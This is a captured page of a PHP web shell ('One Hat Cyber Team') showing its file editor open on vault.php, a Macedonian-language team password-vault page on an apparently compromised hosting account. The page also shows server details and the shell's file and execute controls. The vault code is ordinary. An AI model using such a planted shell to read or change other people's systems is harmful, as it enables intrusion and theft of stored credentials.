⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.70
Server IP:
209.74.65.82
Server:
Linux 209-74-65-82.cprapid.com 5.14.0-427.42.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 1 14:58:02 EDT 2024 x86_64
PHP Version:
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ivsoxidh
/
pw.ivsoftdesign.com
/
Edit File: vault.php
<?php require __DIR__ . '/includes/config.php'; require __DIR__ . '/includes/crypto.php'; ivsoft_session_boot(); session_start(); // Access check if (empty($_SESSION['ivsoft_portal_auth'])) { header('Location: index.php'); exit; } // CSRF за форми if (empty($_SESSION['csrf_token'])) { $_SESSION['csrf_token'] = bin2hex(random_bytes(16)); } $CSRF = $_SESSION['csrf_token']; function s($x){ return safe($x); } $items = vault_read(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!hash_equals($_SESSION['csrf_token'], $_POST['csrf'] ?? '')) { http_response_code(400); exit('CSRF'); } $action = $_POST['action'] ?? ''; if ($action === 'create' || $action === 'update') { $id = trim($_POST['id'] ?? ''); $item = [ 'id' => $id ?: uuid4(), 'title' => trim($_POST['title'] ?? ''), 'url' => trim($_POST['url'] ?? ''), 'username' => trim($_POST['username'] ?? ''), 'password' => (string)($_POST['password'] ?? ''), 'notes' => trim($_POST['notes'] ?? ''), 'tags' => array_values(array_filter(array_map('trim', explode(',', (string)($_POST['tags'] ?? ''))))), 'updated' => date('c'), ]; if ($item['title'] === '') $item['title'] = '(Untitled)'; $found = false; foreach ($items as &$it) { if ($it['id'] === $item['id']) { $it = $item; $found = true; break; } } if (!$found) $items[] = $item; usort($items, fn($a,$b)=> strcasecmp($a['title'],$b['title'])); vault_write($items); header('Location: vault.php'); exit; } if ($action === 'delete') { $id = trim($_POST['id'] ?? ''); $items = array_values(array_filter($items, fn($it) => $it['id'] !== $id)); vault_write($items); header('Location: vault.php'); exit; } } ?><!doctype html> <html lang="mk"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width,initial-scale=1"> <title><?= s(PORTAL_NAME) ?> — Vault</title> <link rel="stylesheet" href="assets/styles.css"> </head> <body class="gradient-bg"> <header class="topbar"> <div class="brand">🔐 <?= s(PORTAL_NAME) ?></div> <nav class="topnav"> <a class="toplink" href="logout.php" title="Одјава">Одјава</a> </nav> </header> <main class="container"> <h2 class="page-title">Passwords & Links</h2> <p class="muted">Безбедно складиште за тимот. Пребарај/уреди/бриши записи.</p> <div class="toolbar"> <div class="search"> <input id="q" type="search" placeholder="Пребарај по наслов, url, корисничко, таг..." oninput="filterCards()"> </div> <button class="btn-primary" onclick="openModal()">+ Нов запис</button> </div> <section id="vaultGrid" class="vault-grid"> <?php foreach ($items as $it): ?> <article class="vault-card" data-title="<?= s(strtolower($it['title'])) ?>" data-url="<?= s(strtolower($it['url'])) ?>" data-user="<?= s(strtolower($it['username'])) ?>" data-tags="<?= s(strtolower(implode(',', $it['tags'] ?? []))) ?>"> <h3 class="v-title"><?= s($it['title']) ?></h3> <?php if (!empty($it['url'])): ?> <div class="v-url"><a href="<?= s($it['url']) ?>" target="_blank" rel="noopener"><?= s($it['url']) ?></a></div> <?php endif; ?> <div class="v-meta"> <div class="v-field"> <span>👤 <code><?= s($it['username']) ?></code></span> <button class="btn-sec" onclick="copyText('<?= s($it['username']) ?>')">Copy</button> </div> <div class="v-field"> <span>🔒 <code data-pw hidden><?= s($it['password']) ?></code><em data-mask>••••••••</em></span> <div> <button class="btn-sec" onclick="togglePw(this)">Show</button> <button class="btn-sec" onclick="copyPw(this)">Copy</button> </div> </div> </div> <?php if (!empty($it['notes'])): ?> <div style="margin-top:10px; color:#cbd5e1; white-space:pre-wrap"><?= s($it['notes']) ?></div> <?php endif; ?> <div class="taglist"> <?php foreach ($it['tags'] ?? [] as $tg): ?> <span class="tag">#<?= s($tg) ?></span> <?php endforeach; ?> </div> <div class="v-actions"> <button class="btn-sec" onclick='editItem(<?= json_encode($it, JSON_HEX_TAG|JSON_HEX_APOS|JSON_HEX_AMP|JSON_HEX_QUOT) ?>)'>✏️ Уреди</button> <form method="post" onsubmit="return confirm("Да го избришам записот?")"> <input type="hidden" name="csrf" value="<?= s($CSRF) ?>"> <input type="hidden" name="action" value="delete"> <input type="hidden" name="id" value="<?= s($it['id']) ?>"> <button class="btn-sec danger" type="submit">🗑️ Бриши</button> </form> </div> <div class="muted" style="margin-top:6px;font-size:12px">Последно: <?= s(date('Y-m-d H:i', strtotime($it['updated'] ?? 'now'))) ?></div> </article> <?php endforeach; ?> <?php if (empty($items)): ?> <div class="vault-card"> <p class="muted">Нема записи. Кликни „Нов запис“ за да додадеш.</p> </div> <?php endif; ?> </section> </main> <!-- Modal --> <dialog id="vModal" class="v-modal"> <form method="post" id="vForm"> <div class="m-head"> <strong id="mTitle">Нов запис</strong> <button type="button" class="toplink" onclick="closeModal()">✖</button> </div> <div class="m-body"> <input type="hidden" name="csrf" value="<?= s($CSRF) ?>"> <input type="hidden" name="action" value="create" id="mAction"> <input type="hidden" name="id" id="mId"> <div class="grid-2"> <div> <label class="label">Наслов</label> <input class="input" name="title" id="mTitleInput" placeholder="Пр. MailWizz Admin" required> </div> <div> <label class="label">URL</label> <input class="input" name="url" id="mUrl" placeholder="https://..."> </div> <div> <label class="label">Корисничко</label> <input class="input" name="username" id="mUser" placeholder="user@example.com"> </div> <div> <label class="label">Лозинка</label> <input class="input" name="password" id="mPass" placeholder="••••••••"> </div> </div> <div style="margin-top:12px"> <label class="label">Тагови (оддели со запирка)</label> <input class="input" name="tags" id="mTags" placeholder="email, prod, admin"> </div> <div style="margin-top:12px"> <label class="label">Забелешки</label> <textarea class="input" name="notes" id="mNotes" rows="4" placeholder="Коментари, инструкции..."></textarea> </div> </div> <div class="m-actions"> <button type="button" class="btn-sec" onclick="closeModal()">Откажи</button> <button class="btn-primary" type="submit" id="mSubmit">Зачувај</button> </div> </form> </dialog> <script src="assets/app.js"></script> </body> </html>
Simpan